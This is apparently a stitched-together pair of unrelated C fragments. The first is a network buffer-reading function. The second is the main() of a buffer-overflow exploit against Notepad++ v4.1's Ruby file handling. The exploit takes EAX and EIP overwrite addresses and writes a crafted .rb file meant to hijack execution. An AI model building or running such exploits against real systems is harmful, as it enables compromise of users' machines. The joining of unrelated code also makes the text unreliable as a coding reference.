static FillBufferResult fill_buffer (struct neon_handle * h) { int bsize = free_rb (& h->rb); int to_read = MIN (bsize, NEON_NETBLKSIZE); char buffer[NEON_NETBLKSIZE]; bsize = ne_read_response_block (h->request, buffer, to_read); if (! bsize) { _DEBUG ("<%p> End of file encountered", h); return FILL_BUFFER_EOF; } if (bsize < 0) { _ERROR ("<%p> Error while reading from the network", (void *) h); ne_request_destroy (h->request); h->request = NULL; return FILL_BUFFER_ERROR; } _DEBUG ("<%p> Read %d bytes of %d", h, bsize, to_read); write_rb (& h->rb, buffer, bsize); return FILL_BUFFER_SUCCESS; }
/* start. */ int main(int argc,char **argv){ signed int chr=0; char *ptr; printf("[*] notepad++[v4.1]: (win32) ruby file processing buffer over" "flow exploit.\n[*] by: vade79/v9 [email protected] (fakehalo/realhalo)" "\n\n"); tbl.eax=DFL_EAX; tbl.eip=DFL_EIP; while((chr=getopt(argc,argv,"f:x:e:"))!=EOF){ switch(chr){ case 'f': if(!tbl.file){ if((ptr=rindex(optarg,'.'))&&!strcasecmp(ptr,".rb")){ if(!(tbl.file=(char *)strdup(optarg))) printe("main(): allocating memory failed",1); } else{ if(!(tbl.file=(char *)malloc(strlen(optarg)+4))) printe("main(): allocating memory failed",1); sprintf(tbl.file,"%s.rb",optarg); } } break; case 'x': sscanf(optarg,"%x",&tbl.eax); break; case 'e': sscanf(optarg,"%x",&tbl.eip); break; default: usage(argv[0]); break; } } if(!tbl.file)usage(argv[0]); printf("[*] filename:\t\t\t%s\n",tbl.file); printf("[*] EAX address:\t\t0x%.8x\n",tbl.eax); printf("[*] EIP address:\t\t0x%.8x\n\n",tbl.eip); if(write_rb(tbl.file,tbl.eax,tbl.eip)) printe("failed to write to file.",1); exit(0); }